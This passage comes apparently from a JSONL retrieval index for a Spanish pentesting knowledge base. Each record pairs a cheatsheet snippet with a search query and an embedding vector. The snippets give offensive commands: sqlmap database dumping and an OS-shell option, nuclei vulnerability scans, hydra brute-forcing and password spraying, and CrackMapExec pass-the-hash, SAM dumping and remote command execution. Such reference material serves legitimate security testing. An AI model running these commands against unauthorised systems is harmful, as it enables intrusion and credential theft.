automatica (sqlmap)\n\n```bash\nsqlmap -u \"http://IP/page?id=1\" --batch --dbs\nsqlmap -u \"http://IP/page?id=1\" -D basedatos --tables\nsqlmap -u \"http://IP/page?id=1\" -D basedatos -T users --dump\nsqlmap -r peticion.txt --batch --level 5 --risk 3 # peticion de Burp\nsqlmap -u URL --os-shell # a shell\nsqlmap -u URL --data \"user=1&pass=1\" -p user # POST\n```", "indexar": "cual es una alternativa libre a sqlmap para pruebas de penetraciΓ³n", "v": [-0.00188, 0.00568, -0.14361, -0.12741, -0.05717, -0.12875, -0.06363, -0.04933, -0.04743, 0.01861, -0.10548, -0.08351, -0.00828, -0.01792, -0.04267, 0.06118, 0.01614, -0.10861, 0.0561, -0.0112, -0.05843, -0.03572, -0.16577, -0.16243, -0.07838, 0.09824, -0.07375, 0.10356, -0.05392, -0.10854, -0.07211, -0.03527, 0.05912, -0.0133, -0.02444, -0.0112, 0.12387, 0.05943, 0.10102, 0.01806, -0.00878, -0.14791, -0.03429, 0.06448, 0.04402, -0.09727, -0.03243, 0.07667, -0.09771, -0.03663, -0.06956, 0.06482, -0.07482, -0.03924, -0.00117, -0.0534, 0.08702, -0.10239, -0.00179, 0.02769, -0.09475, -0.02124, 0.00593, -0.07938, 0.06533, -0.02604, 0.01818, 0.06529, -0.02831, 0.14898, 0.10923, 0.06694, -0.01683, -0.10409, -0.17737, 0.0105, 0.00647, -0.0136, 0.01332, 0.03101, 0.01358, -0.05987, -0.02715, 0.0582, -0.06643, -0.06325, 0.05843, -0.02235, 0.0658, 0.02154, 0.05376, 0.05948, 0.00756, 0.14992, 0.01935, -0.11704, 0.04653, 0.01162, 0.01484, -0.00088, 0.09332, 0.02614, -0.15844, 0.06982, 0.03097, -0.01516, 0.0055, 0.05409, -0.0692, -0.0297, 0.07624, 0.06498, -0.09209, -0.03485, -0.019, -0.01485, -0.00762, 0.02042, -0.08147, -0.04695, -0.06248, -0.0221, -0.09463, -0.06232, -0.04022, -0.00912, 0.05228, -0.00216, -0.05205, 0.09229, 0.14286, 0.04144, -0.1012, -0.03755, -0.06421, -0.04743, 0.02529, -0.08748, 0.01188, 0.01048, -0.02642, 0.04956, 0.00782, -0.06157, 0.01058, 0.04539, -0.06443, -0.0056, -0.07643, 0.00205, -0.1478, 0.01714, -0.02357, 0.15721, -0.0438, -0.02205, 0.01285, -0.01169, -0.07503, 0.10671, 0.02523, -0.02869, -0.04222, 0.06596, 0.04064, 0.02823, -0.02401, -0.14189, -0.01568, 0.00976, 0.02395, 0.09595, 0.05665, -0.09904, 0.09301, -0.06042, -0.01058, -0.11662, 0.0297, -0.05507, 0.0408, 0.03356, -0.09416, -0.05414, 0.03543, -0.00868, -0.00617, -0.00023, 0.07271, 0.0137, -0.01211, 0.03503, -0.06849, -0.05731, 0.0215, -0.01974, 0.02813, -0.02214, -0.10011, -0.05853, -0.06282, -0.10674, -0.022, -0.0306, -0.05859, 0.01161, -0.01048, 0.02685, 0.0277, -0.01044, 0.02856, 0.02527, 0.04647, -0.02037, -0.09227, -0.05239, 0.04181, 0.01561, -0.04035, 0.00535, 0.03056, 0.04088, 0.01201, 0.00137, -0.06112, 0.04652, -0.01187, 0.01283, 0.00491, 0.01591, 0.07103, 0.00347, 0.00072, -0.00052, 0.04348, -0.02152, -0.04038, 0.03854, 0.04511, -0.07743, 0.01323, 0.08245, -0.05382, 0.03113, -0.03285, 0.00635, -0.04146, -0.05279, -0.04514, -0.06346, -0.01563, 0.02096, 0.0075, -0.05263, 0.06233, -0.00681]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Escaneo de vulnerabilidades (nuclei)\n\n```bash\nnuclei -u http://IP\nnuclei -l objetivos.txt -severity critical,high\nnuclei -u http://IP -t cves/ -t exposures/\nnuclei -u http://IP -tags sqli,xss,lfi\n```", "indexar": "que programa hay para escanear vulnerabilidades de forma rΓ‘pida?", "v": [0.07801, -0.03, -0.16438, -0.11664, 0.03082, -0.0492, -0.009, -0.14841, -0.00782, 0.01993, 0.02663, -0.07166, -0.05427, -0.08074, -0.0032, 0.10125, -0.00066, -0.13151, 0.09477, 0.12644, -0.02804, -0.01702, -0.00415, -0.03638, -0.11892, 0.02748, -0.07165, 0.05351, -0.04265, -0.05972, 0.00672, 0.07112, 0.07753, 0.00582, -0.05011, 0.09885, 0.07926, -0.0697, 0.07352, 0.07137, 0.04754, -0.04591, -0.02557, -0.05304, 0.06492, -0.02624, -0.07685, 0.03367, 0.03949, -0.00878, -0.05602, 0.03301, -0.08227, 0.00205, 0.02076, -0.1113, 0.00773, -0.12736, -0.05757, 0.00298, -0.02665, 0.1109, 0.08998, -0.07951, 0.01341, 0.04164, 0.05066, -0.00467, -0.15322, 0.0579, -0.00815, -0.03649, 0.0116, -0.01038, -0.04586, -0.02754, -0.11151, 0.02617, 0.00935, 0.01182, 0.0152, 0.02783, 0.05177, 0.08468, -0.19001, -0.00183, 0.08031, -0.01597, 0.01276, -0.01598, 0.09787, 0.07047, -0.00137, 0.09947, 0.02585, -0.11855, 0.16335, 0.09362, -0.0241, 0.02763, -0.0749, -0.09539, -0.11207, 0.16547, -0.02876, 0.14038, 0.00165, 0.01746, -0.05916, 0.05451, -0.03643, 0.0286, -0.0262, -0.06541, -0.09187, 0.03854, 0.00617, -7e-05, 0.07964, -0.05066, -0.07411, -0.07534, -0.07086, 0.01293, 0.07019, -0.0034, -0.02897, 0.03059, -0.03348, 0.04645, -0.00404, -0.06684, -0.03907, 0.00931, -0.05596, -0.03822, 0.00883, -0.08082, 0.01161, -0.0741, 0.05887, 0.02266, 0.03669, 0.02981, -0.03056, 0.02366, 0.07259, -0.09384, -0.04629, 0.05208, 0.02842, 0.05614, -0.09155, 0.02805, -0.09147, -0.06476, 0.00401, -0.00627, -0.07309, 0.10264, -0.04442, 0.05611, 0.01323, -0.00807, 0.01337, -0.08004, 0.10782, 0.04776, 0.08147, 0.08692, -0.01398, 0.12356, 0.0679, -0.05788, 0.02999, -0.01072, 0.00843, -0.08463, 0.02038, -0.07149, -0.06877, 0.01241, 0.06133, 0.01696, -0.01437, -0.02915, -0.00774, 0.06814, 0.03451, 0.02182, 0.00342, -0.02235, -0.00135, 0.00313, -0.0106, -0.02753, -0.03752, 0.02449, 0.01931, -0.08508, -0.12035, -0.04878, -0.02316, -0.02178, 0.06956, 0.13082, 0.00462, -0.08331, 0.05226, 0.13926, -0.00194, -0.03069, 0.0846, -0.00785, 0.01549, -0.05425, 0.0261, 0.08706, 0.0489, -0.02729, -0.03857, -0.0397, 0.04852, 0.10141, -0.01697, -0.07913, -0.02125, -0.00595, 0.02338, 0.00315, 0.04063, -0.08955, -0.04874, -0.1036, 0.04486, -0.03996, -0.00028, -0.0357, -0.0046, -0.06409, 0.02313, 0.03996, -0.00992, -0.03528, -0.04275, 0.00058, -0.03795, 0.006, -0.00033, -0.00809, -0.05029, 0.0449, 0.00539, -0.134, 0.0495, -0.0521]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Escaneo de vulnerabilidades (nuclei)\n\n```bash\nnuclei -u http://IP\nnuclei -l objetivos.txt -severity critical,high\nnuclei -u http://IP -t cves/ -t exposures/\nnuclei -u http://IP -tags sqli,xss,lfi\n```", "indexar": "cual es una alternativa libre a las herramientas tradicionales de escaneo?", "v": [-0.03466, -0.01436, -0.16823, 0.04342, -0.04418, -0.02886, -0.01908, -0.0947, -0.10162, -0.00958, -0.12096, -0.04674, -0.06243, -0.05139, 0.10819, 0.02597, 0.06011, -0.10216, 0.14089, 0.07833, -0.11297, 0.02927, -0.14195, 0.00291, -0.03446, -0.10713, -0.02716, 0.066, -0.13333, 0.13378, 0.0412, 0.12806, 0.10377, -0.07583, -0.03552, -0.01116, 0.11791, 0.01429, -0.00567, -0.08165, 0.03843, -0.09009, -0.07165, -0.03437, -0.03741, -0.11195, -0.11919, 0.06783, -0.06101, 0.08703, -0.08473, -0.0786, -0.05697, 0.00826, 0.09693, -0.11787, 0.19226, -0.03008, -0.03962, -0.08826, -0.11236, 0.11867, 0.0582, -0.02367, -0.02359, -0.00414, -0.0352, -0.04413, -0.06674, 0.08942, 0.04063, 0.02459, 0.03435, -0.01339, -0.12212, 0.01862, -0.02168, 0.04468, 0.01456, -0.00919, 0.02525, -0.05183, -0.01659, 0.01025, -0.09599, -0.07268, 0.0939, -0.1238, -0.01531, -0.02603, 0.02178, 0.03026, 0.05116, 0.09922, 0.06497, -0.06218, 0.04781, 0.05058, 0.02501, 0.09569, 0.10113, -0.00249, -0.10838, 0.02123, 0.03297, -0.04471, -0.01336, 0.03872, -0.06913, 0.0804, -0.05442, 0.11334, 0.00566, 0.07273, -0.00208, 0.03476, -0.0557, -0.04588, 0.00762, 0.01269, 0.00974, 0.00134, -0.04869, -0.02068, 0.01297, -0.02001, -0.02991, 0.03873, 0.00197, 0.00544, 0.04241, -0.0513, -0.0621, -0.06741, -0.08046, -0.09044, 0.1382, -0.11192, 0.0355, -0.05689, 0.00076, 0.04259, -0.0457, -0.13174, 0.05534, -0.00024, 0.03653, -0.05267, -0.02575, -0.03908, -0.08406, 0.01015, -0.02315, 0.12835, -0.07364, -0.00933, -0.08084, 0.01363, -0.07678, 0.13209, 0.01237, -0.07384, 0.03938, -0.00442, -0.05455, -0.04205, -0.00382, -0.01176, -0.08309, -0.01624, 0.031, 0.09903, 0.02639, -0.05061, 0.02677, -0.03281, -0.03868, -0.09796, 0.06287, -0.03218, -0.01846, 0.08949, -0.11011, -0.02626, 0.04677, -0.06205, -0.0227, -0.02214, 0.02259, 0.0585, -0.01524, 0.0254, -0.06303, -0.11353, -0.03984, 0.0477, -0.01364, -0.03262, -0.00376, -0.0324, -0.08234, 0.03267, -0.03177, -0.09806, -0.02449, 0.03146, -0.05996, -0.02735, -0.01275, 0.08449, 0.02421, -0.01121, 0.07772, -0.02959, -0.02068, -0.02455, -0.00644, -0.03582, -0.00603, 0.00369, 0.04334, 0.00888, 0.0732, -0.01887, -0.05452, 0.02839, 0.05353, 0.05706, -0.01094, 0.00331, 0.01824, -0.03046, -0.02943, 0.00955, 0.01541, 0.00441, 0.02288, -0.01685, -0.04482, 0.01568, 0.04626, 0.05929, -0.04721, -0.00246, -0.05338, -0.00482, -0.07393, -0.0556, -0.02905, -0.02583, -0.04501, 0.07093, 0.04447, -0.02054, 0.01318, -0.04387]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Escaneo de vulnerabilidades (nuclei)\n\n```bash\nnuclei -u http://IP\nnuclei -l objetivos.txt -severity critical,high\nnuclei -u http://IP -t cves/ -t exposures/\nnuclei -u http://IP -tags sqli,xss,lfi\n```", "indexar": "con que puedo buscar fallos especΓ­ficos como inyecciΓ³n SQL o XSS en un sitio?", "v": [0.01223, -0.06696, -0.15339, 0.09382, -0.07405, -0.26646, -0.06438, -0.25604, 0.02651, 0.08502, -0.12265, -0.01917, 0.01589, -0.06079, -0.00133, 0.01414, 0.02134, -0.05046, -0.12678, 0.02889, 0.05751, -0.16771, -0.08773, -0.10422, -0.05545, 0.01062, -0.00165, 0.01954, -0.07498, -0.08246, -0.01955, -0.03392, -0.0301, -0.01891, 0.01908, -0.00664, -0.10026, 0.10883, -0.04134, -0.05913, -0.00588, 0.0408, -0.20369, 0.00215, 0.04536, -0.06058, -0.01793, 0.02486, -0.02485, -0.07391, 0.04235, -0.07834, -0.14434, -0.07505, -0.02345, -0.08867, 0.12272, -0.03362, 0.03704, 0.03555, -0.08271, 0.00082, 0.06998, -0.01641, -0.05983, -0.03925, 0.07132, 0.00099, 0.04675, -0.03723, -0.09657, -0.07341, -0.00925, -0.0777, 0.11974, 0.00091, 0.12587, 0.06085, 0.07493, 0.0011, -0.11307, -0.04657, -0.11206, 0.0725, -0.01286, -0.00976, 0.02113, -0.05778, -0.05096, -0.12182, 0.09502, -0.0228, 0.04301, 0.01175, -0.05068, -0.03265, 0.08283, -0.03819, -0.00889, 0.03245, 0.0222, -0.02775, -0.02412, 0.11359, 0.00918, 0.0618, 0.06421, -0.0133, 0.04204, -0.05209, 0.10282, -0.06492, -0.00841, -0.08384, -0.02473, -0.00928, -0.02082, 0.03094, -0.05521, 0.01997, -0.05955, -0.03944, 0.01673, 0.0059, -0.04267, -0.09752, 0.00033, 0.02461, 0.00271, 0.00456, 0.06942, 0.03441, -0.05109, 0.00734, -0.06701, 0.05225, 0.04398, 0.03379, -0.05433, -0.03274, 0.00358, -0.04144, 0.04252, -0.00265, 0.00903, 0.05574, -0.01626, 0.02954, -0.0547, -0.09086, -0.03095, 0.00406, 0.06552, 0.03739, -0.07146, -0.01593, -0.01027, 0.01564, 0.013, 0.08355, -0.02608, 0.01939, 0.00572, 0.06238, 0.03203, -0.00499, -0.04084, -0.03003, 0.02282, 0.05027, -0.0492, 0.07853, -0.04667, -0.1554, -0.02867, 0.02037, -0.0728, -0.08661, 0.15602, -0.03718, -0.00553, -0.00391, -0.05109, 0.00571, -0.03293, -0.07297, 0.00756, 0.00699, 0.06214, -0.03947, -0.00979, -0.02509, -0.00091, -0.0565, 0.03254, -0.03829, -0.00256, 0.03401, -0.0025, -0.06762, -0.05928, -0.00302, 0.00702, -0.07066, 0.01102, -0.01429, -0.08206, 0.00214, -0.04795, 0.00242, 0.01975, -0.0241, 0.04444, -0.02104, -0.08822, -0.07843, 0.06446, -0.03184, -0.04118, 0.03667, -0.01994, 0.01905, 0.06461, -0.0537, 0.00042, -0.03963, 0.03709, -0.06309, -0.02009, 0.0998, -0.02259, -0.00606, -0.09214, -0.01542, 0.12853, 0.06227, -0.02672, -0.01881, -0.03743, -0.04121, 0.08908, 0.07458, -0.02018, -0.01221, 0.00166, -0.04991, -0.12208, 0.04715, 0.00983, -0.05552, 0.04088, 0.03909, 0.02051, -0.01989, 0.01544, 0.00785]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Fuerza bruta de credenciales (hydra)\n\n```bash\nhydra -l USER -P WL ssh://IP\nhydra -L users.txt -P WL IP ssh -t 4\nhydra -l USER -P WL IP http-post-form \"/login:user=^USER^&pass=^PASS^:F=incorrect\"\nhydra -l USER -P WL ftp://IP\nhydra -L users.txt -p PASS smb://IP # spraying\n```", "indexar": "que herramienta sirve para hacer fuerza bruta de credenciales en SSH", "v": [-0.00124, -0.1049, -0.26917, -0.05458, 0.0387, -0.09626, -0.04694, -0.11893, 0.07523, -0.06932, -0.11623, 0.10874, 0.00988, -0.05471, 0.03231, 0.01822, -0.04044, -0.14947, -0.15744, 0.02681, 0.02639, -0.12251, 0.01159, -0.08672, -0.12853, -0.04569, -8e-05, 0.12695, -0.13105, 0.09653, 0.01589, 0.13345, 0.10937, -0.05377, 0.01072, 0.002, -0.15597, 0.01623, 0.07273, 0.12618, -0.06795, 0.10357, -0.03422, -0.01603, 0.01028, 0.04244, -0.04048, 0.0703, -0.08172, 0.14092, -0.10022, -0.14151, -0.12765, -0.06666, -0.0748, -0.11229, 0.09475, -0.16518, -0.14141, -0.0592, -0.13874, 0.0253, -0.04074, -0.05221, -0.01251, -0.02231, -0.02399, -0.09613, -0.03012, -0.01076, -0.17952, -0.03567, 0.01031, -0.02499, -0.12556, -0.02536, 0.01429, 0.0754, -0.02869, -0.04651, 0.01145, -0.01637, -0.11794, -0.00793, -0.04538, -0.0486, 0.06857, -0.0553, -0.00602, -0.02755, -0.02841, 0.0999, 0.01225, 0.03395, 0.01779, 0.06218, -0.02566, -0.01439, 0.01537, -0.05893, 0.07994, -0.12917, -0.02623, -0.02588, 0.06116, -0.03369, -0.02987, 0.03849, -0.0386, 0.08423, 0.08268, -0.01038, -0.02949, 0.06238, -0.02821, 0.08362, -0.08651, -0.10349, -0.02983, 0.00722, 0.02373, -0.03587, -0.05712, -0.00375, -0.05441, 0.07524, -0.0166, 0.04465, 0.00077, -0.11904, 0.01967, -0.01602, 0.00557, 0.03062, 0.06388, -0.0796, 0.04296, -0.12161, -0.01395, -0.08463, 0.02596, 0.01091, 0.00907, -0.13296, 0.01621, 0.03194, 0.02169, -0.04533, -0.01589, -0.02655, 0.1172, -0.01912, 0.01456, 0.04287, -0.02297, -0.00823, 0.06273, -0.04106, -0.08196, 0.03978, -0.07393, -0.10105, -0.00167, 0.01164, 0.01619, -0.00259, -0.03381, -0.00705, 0.02769, 0.03779, 0.02065, -0.03759, 0.07577, 0.01985, 0.03317, -0.08086, -0.04876, 0.05922, -0.0417, -0.039, 0.01553, 0.00034, -0.02556, 0.00552, 0.02241, 0.02547, 0.03124, -0.02425, 0.00398, -0.00196, 0.00507, 0.04494, -0.00248, 0.00417, 0.00993, 0.01431, 0.01187, 0.00781, 0.02687, 0.013, -0.05056, -0.04357, -0.02665, -0.02563, 0.0561, 0.06641, 0.03873, -0.01342, 0.0106, 0.02994, 0.00891, -0.00282, 0.03055, -0.06597, -0.02779, -0.04236, -0.0145, 0.01908, 0.00545, -0.00411, -0.02043, 0.00554, -0.01761, 0.01153, -0.02888, 0.0106, 0.03014, -0.05155, 0.01305, 0.02395, 0.02826, -0.05785, 0.01626, 0.00436, -0.01478, -0.03675, 0.01599, 0.02266, -0.06195, 0.00182, -0.05049, 0.00941, 0.0002, -0.02546, -0.06377, -0.00443, 0.01011, -0.04359, -0.01821, -0.02562, -0.00521, 0.01728, 0.07781, -0.00399, 0.02129, -0.01404]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Fuerza bruta de credenciales (hydra)\n\n```bash\nhydra -l USER -P WL ssh://IP\nhydra -L users.txt -P WL IP ssh -t 4\nhydra -l USER -P WL IP http-post-form \"/login:user=^USER^&pass=^PASS^:F=incorrect\"\nhydra -l USER -P WL ftp://IP\nhydra -L users.txt -p PASS smb://IP # spraying\n```", "indexar": "cual programa puedo usar para probar contraseΓ±as masivamente en un servidor", "v": [0.0583, 0.03629, -0.19634, -0.16574, -0.07133, -0.09142, 0.03357, -0.14763, -0.09895, -0.10408, -0.08156, 0.00046, 0.0364, -0.06262, -0.07277, 0.04689, 0.22202, -0.07684, 0.06793, 0.08478, 0.06838, -0.06638, -0.07815, -0.05323, -0.07932, 0.03226, 0.07853, -0.0717, -0.07547, -0.07846, -0.03653, -0.01941, 0.10036, -0.05352, -0.01586, 0.04073, 0.00141, 0.09331, 0.03617, 0.08443, 0.12734, 0.03488, -0.13968, 0.03666, 0.02334, 0.03136, 0.04276, -0.03957, -0.01576, -0.05084, -0.07541, -0.06592, -0.10142, -0.05403, 0.01255, -0.09293, 0.06177, -0.13631, -0.00487, 0.03074, -0.11219, 0.0093, 0.01689, 0.01563, -0.00129, -0.11612, 0.00888, -0.02188, -0.16575, 0.03373, -0.03807, 0.07082, -0.02396, -0.00843, 0.02141, 0.05566, 0.01767, -0.07156, 0.05262, 0.0503, -0.05321, 0.00534, 0.03675, 0.08387, -0.17314, -0.06322, 0.06302, -0.04815, 0.05776, -0.00498, 0.07319, 0.04194, -0.01863, 0.10439, 0.08593, -0.07345, 0.13482, 0.0029, -0.02129, -0.02817, 0.07842, 0.03531, -0.03711, 0.15593, -0.06021, 0.06523, 0.07137, -0.03178, 0.03299, -0.06187, 0.0383, -0.04149, -0.13217, -0.01449, -0.08212, -0.05419, -0.02588, -0.06078, 0.05857, 0.00207, -0.0735, 0.00156, -0.03297, 0.04785, 0.12834, 0.02188, 0.06672, 0.02397, -0.07301, -0.01872, 0.01808, 0.00774, -0.03901, -0.01076, -0.04489, 0.01078, 0.04451, -0.09714, -0.08707, -0.02244, 0.0146, 0.04545, -0.00181, -0.00563, 0.0861, 0.05276, 0.04669, -0.05741, -0.06835, 0.0593, 0.01875, -0.02688, -0.0274, 0.05799, -0.11873, -0.0418, 0.0175, -0.10831, -0.08196, 0.11733, -0.0366, 0.02961, -0.00568, 0.06634, 0.01628, -0.04962, 0.00865, 0.03812, 0.05181, 0.08397, 0.01816, 0.06596, 0.00591, -0.05949, 0.02645, -0.01415, -0.05682, -0.10613, 0.01238, -0.0379, -0.03744, 0.00629, -0.00781, 0.00284, -0.00689, -0.03968, 0.02348, 0.04592, 0.00143, 0.00675, 0.03414, 0.05151, -0.04396, 0.02705, 0.03344, -0.04889, -0.0081, -0.05734, -0.0245, -0.09366, -0.04065, -0.02007, -0.0729, -0.0683, 0.0454, 0.01749, -0.07161, -0.00304, 0.00351, 0.05914, 0.00289, -0.04055, 0.09883, -0.02443, -0.08289, -0.03334, 0.00474, 0.01105, 0.0024, -0.01176, 0.00454, 0.01863, 0.02882, 0.0774, 0.0124, -0.03373, 0.03245, 0.01602, 0.04389, -0.00357, -0.02848, 0.02578, -0.05379, -0.02572, 0.06402, -0.00698, -0.00972, -0.04296, -0.04654, -0.10817, -0.02758, 0.11721, -0.00507, -0.06495, -0.04442, -0.04521, -0.06735, 0.0029, -0.04492, -0.01559, -0.02748, 0.01239, 0.03504, -0.05131, 0.0235, 0.00229]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Fuerza bruta de credenciales (hydra)\n\n```bash\nhydra -l USER -P WL ssh://IP\nhydra -L users.txt -P WL IP ssh -t 4\nhydra -l USER -P WL IP http-post-form \"/login:user=^USER^&pass=^PASS^:F=incorrect\"\nhydra -l USER -P WL ftp://IP\nhydra -L users.txt -p PASS smb://IP # spraying\n```", "indexar": "hay alguna alternativa libre a hydra para atacar puertos remotos", "v": [0.23147, -0.00409, -0.17325, -0.02158, 0.05846, 0.072, 0.1558, -0.01427, -0.15576, 0.00865, -0.03334, -0.12162, 0.16367, 0.07033, 0.24123, -0.07586, 0.01837, 0.0918, 0.05228, -0.01226, -0.02936, 0.02744, -0.0328, -0.01931, -0.06667, -0.13999, 0.05252, 0.10739, -0.10233, -0.07688, 0.04941, 0.05369, 0.10496, 0.08208, -0.03605, -0.04832, 0.03305, 0.10293, 0.15185, -0.07026, 0.06107, 0.04737, -0.03192, -0.14146, 0.05798, -0.03497, -0.06981, -0.04587, 0.03463, -0.02437, -0.00735, -0.01991, -0.13138, -0.04412, 0.0158, 0.01357, 0.11555, -0.01085, -0.04124, -0.07662, -0.02104, 0.07003, 0.08076, -0.06439, 0.01392, -0.05482, -0.0956, -0.02915, -0.16118, 0.04171, -0.05756, -0.03421, 0.05412, 0.06365, -0.08589, -0.03009, -0.06158, 0.01602, 0.06855, 0.04431, -0.02136, -0.10776, -0.02606, -0.0353, -0.12139, -0.15749, 0.02966, -0.08138, 0.03438, -0.10233, 0.10304, -0.04885, -0.02738, 0.11419, -0.07814, -0.031, -0.00801, 0.06756, -0.01633, 0.0374, -0.00047, 0.08661, -0.02147, 0.02124, -0.0226, 0.02979, 0.00508, -0.07169, 0.05573, -0.01276, 0.02748, 0.01413, 0.02188, -0.06441, 0.02369, -0.07255, -0.05405, -0.03437, 0.0213, 0.02746, -0.07001, -0.08915, -0.00729, -0.00362, -0.00989, 0.01896, -0.01423, 0.06591, -0.01475, 0.01932, 0.0326, -0.02413, 0.001, -0.10038, -0.07688, 0.00547, 0.02816, -0.10044, -0.02546, -0.04835, -0.06394, 0.09831, -0.0356, 0.00428, 0.03897, 0.01555, 0.03578, -0.008, -0.06073, -0.0157, -0.01228, 0.00834, -0.02195, 0.12657, -0.08565, 0.03352, 0.0194, -0.06838, -0.0531, 0.10473, -0.00306, 0.00626, -0.04506, -0.00823, -0.01045, -0.03464, -0.02645, -0.07581, 0.00628, 0.0581, -0.04957, 0.12195, -0.01472, -0.07554, 0.01317, -0.03867, 0.00891, -0.04637, -0.00123, -0.03935, -0.05252, 0.04115, -0.09904, -0.08513, -0.02777, -0.03502, -0.02046, -0.02217, 0.03884, 0.06816, -0.01875, -0.02015, -0.07053, -0.02129, -0.02771, -0.01574, -0.04323, -0.00948, 0.00498, -0.01203, -0.01903, -0.03105, 0.04604, -0.05568, 0.05885, 0.04022, -0.06202, 0.06212, 8e-05, 0.10729, 0.02206, -0.05886, 0.05561, -0.02402, -0.07024, -0.009, 0.00366, -0.03015, 0.04601, 0.05903, -0.02729, 0.05266, 0.00876, 0.03545, 0.017, 0.07465, 0.04461, 0.01087, 0.01468, 0.01968, 0.02678, -0.02528, -0.02227, -0.04684, 0.00255, -0.00311, 0.01382, -0.02685, -0.02762, 0.02565, 0.00993, 0.0055, -0.00175, -0.02748, -0.01936, -0.08386, -0.10507, 0.03096, -0.00371, -0.0238, -0.04954, 0.03253, 0.02415, 0.00799, 0.03851, -0.00521]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# CrackMapExec / NetExec β€” el navaja suiza de AD\ncrackmapexec smb IP -u USER -p PASS --shares\ncrackmapexec smb 10.0.0.0/24 -u USER -p PASS # barrido/spray\ncrackmapexec smb IP -u USER -H HASH --sam # pass-the-hash + dump SAM\ncrackmapexec winrm IP -u USER -p PASS -x \"whoami\"\nnetexec smb IP -u USER -p PASS --users --groups", "indexar": "que herramienta sirve para probar credenciales en una red local de manera rΓ‘pida y con varias opciones?", "v": [-0.04164, 0.08445, -0.26641, -0.09996, 0.05403, -0.0922, 0.00315, 0.00847, 0.01135, -0.21929, -0.0693, -0.10498, 0.06506, -0.15477, 0.09355, 0.08944, -0.00771, -0.08518, 0.0514, 0.00824, -0.00323, -0.09635, -0.15577, 0.00416, 0.02542, 0.02187, 0.07989, -0.0511, -0.12185, 0.08713, 0.01569, 0.04271, 0.00898, -0.05675, -0.14458, 0.01983, -0.01609, 0.0433, -0.00687, 0.04744, -0.02992, 0.00576, -0.05069, 0.05792, 0.0495, 0.06628, -0.14958, 0.05089, -0.12491, 0.03434, -0.03505, -0.18581, -0.13481, -0.07316, -0.01506, -0.08108, 0.08177, -0.1345, -0.05203, -0.08628, -0.05686, -0.05097, -0.02296, -6e-05, 0.00698, -0.00518, -0.04737, -0.04182, -0.08966, 0.03494, -0.06475, 0.04383, -0.00768, 0.01081, -0.05884, 0.01987, -0.02086, 0.07055, 0.12577, -0.08221, 0.10414, -0.00476, -0.02585, 0.01209, -0.0581, -0.11679, 0.01324, -0.08756, 0.01662, -0.00236, 0.05496, 0.05327, 0.09181, 0.07056, 0.01872, -0.04316, 0.08219, -0.01999, 0.00385, -0.00765, 0.15116, -0.12386, -0.11237, 0.08911, -0.03294, 0.00849, 0.01542, 0.05922, -0.02208, -0.01337, 0.07575, 0.02844, -0.02292, 0.04633, -0.0141, -0.0302, -0.03638, -0.0265, -0.02959, 0.00759, 0.02426, -0.03637, -0.05308, -0.06443, -0.03001, -0.00133, -0.08161, -0.01407, -0.00808, -0.00277, -0.01699, -0.02151, -0.02764, -0.03708, 0.00139, -0.03996, 0.01996, -0.13168, -0.00794, -0.04297, 0.04897, 0.01797, -0.0145, -0.15797, 0.0204, 0.03666, 0.00486, -0.03554, 0.00213, 0.04745, -0.02856, -0.04641, -0.02362, 0.03216, -0.0895, 0.01247, 0.05682, -0.03111, -0.064, 0.10967, -0.04562, -0.02497, 0.06894, 0.0612, -0.02155, -0.09201, -0.01822, -0.00728, 0.07468, 0.02039, -0.00198, 0.09791, -0.0478, -0.04576, 0.01033, -0.06307, -0.06727, -0.05605, 0.00767, -0.10274, 0.04263, 0.00493, -0.06281, 0.01441, 0.02734, -0.07426, 0.0147, -0.00112, 0.00798, -0.00197, 0.01389, -0.01451, -0.02231, -0.01084, 0.0201, 0.04222, 0.03988, -0.06938, -0.02812, -0.01775, -0.13434, -0.02662, -0.05639, -0.01242, 0.01771, 0.10316, -0.01627, 0.04192, -0.04091, 0.05724, 0.01237, -0.01016, 0.0823, -0.01396, -0.03909, -0.04334, 0.05442, -0.03676, -0.02115, 0.00076, 0.08141, -0.02478, 0.00728, 0.02125, -0.02549, 0.01737, 0.04217, -0.01764, -0.00992, 0.02029, 0.0687, 0.01258, -0.03283, -0.02911, 0.03254, -0.05203, 0.11037, 0.01981, -0.07211, -0.06704, 0.00584, 0.05825, -0.04681, -0.01161, -0.05257, -0.05251, -0.07017, -0.01879, 0.00844, -0.06037, -0.03503, 0.01957, 0.07685, -0.04224, 0.0495, -0.01642]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# CrackMapExec / NetExec β€” el navaja suiza de AD\ncrackmapexec smb IP -u USER -p PASS --shares\ncrackmapexec smb 10.0.0.0/24 -u USER -p PASS # barrido/spray\ncrackmapexec smb IP -u USER -H HASH --sam # pass-the-hash + dump SAM\ncrackmapexec winrm IP -u USER -p PASS -x \"whoami\"\nnetexec smb IP -u USER -p PASS --users --groups", "indexar": "existe alguna alternativa libre a CrackMapExec o NetExec para auditorΓ­a de Active Directory?", "v": [-0.1778, -0.01122, 0.00893, -0.15852, 0.03809, -0.0604, 